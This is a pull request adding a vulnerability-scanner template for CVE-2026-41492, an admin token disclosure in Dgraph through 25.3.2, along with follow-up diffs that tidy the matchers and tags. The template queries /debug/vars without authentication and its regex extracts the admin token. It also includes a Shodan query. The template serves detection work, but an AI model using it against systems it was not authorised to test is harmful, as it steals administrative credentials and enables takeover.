### PR TITLE
Add CVE-2026-41492

### DIFF
--- a/http/cves/2026/CVE-2026-41492.yaml
+++ b/http/cves/2026/CVE-2026-41492.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-41492
+
+info:
+  name: Dgraph <= 25.3.2 - Admin Token Disclosure via /debug/vars
+  author: Divine Balija
+  severity: critical
+  description: |
+    Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes  the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.
+  remediation: |
+    Update to Dgraph version 25.3.3 or later.
+  reference:
+    - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-41492
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-41492
+    epss-score: 0.0006
+    epss-percentile: 0.2718
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dgraph
+    product: dgraph
+    shodan-query: "Dgraph"
+  tags: cve,cve2026,dgraph,exposure,token,info-disclosure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/debug/vars"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: word
+        part: body
+        words:
+          - "cmdline"
+          - "token="
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'token=([^"\\]+)'

--- a/http/cves/2026/CVE-2026-41492.yaml
+++ b/http/cves/2026/CVE-2026-41492.yaml
@@ -35,15 +35,6 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
       - type: word
         part: body
         words:
@@ -51,6 +42,15 @@ http:
           - "token="
         condition: and
 
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+
+      - type: status
+        status:
+          - 200
     extractors:
       - type: regex
         part: body

--- a/http/cves/2026/CVE-2026-41492.yaml
+++ b/http/cves/2026/CVE-2026-41492.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-41492
 
 info:
-  name: Dgraph <= 25.3.2 - Admin Token Disclosure via /debug/vars
+  name: Dgraph <= 25.3.2 - Admin Token Disclosure
   author: Divine Balija
   severity: critical
   description: |
@@ -26,7 +26,7 @@ info:
     vendor: dgraph
     product: dgraph
     shodan-query: "Dgraph"
-  tags: cve,cve2026,dgraph,exposure,token,info-disclosure
+  tags: cve,cve2026,dgraph,exposure,token
 
 http:
   - method: GET
@@ -47,10 +47,10 @@ http:
         words:
           - "application/json"
 
-
       - type: status
         status:
           - 200
+
     extractors:
       - type: regex
         part: body


### PR DESCRIPTION
### PR Information

- Added CVE-2026-41492 — Dgraph <= 25.3.2 admin token disclosure via /debug/vars 

- References:
    - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41492     
       
### Template validation

 - Validated with a host running a vulnerable version and/or configuration (True Positive)                                                            
 - Validated with a host running a patched version and/or configuration (avoid False Positive) 

#### Additional Details (leave it blank if not applicable)

### Additional References:

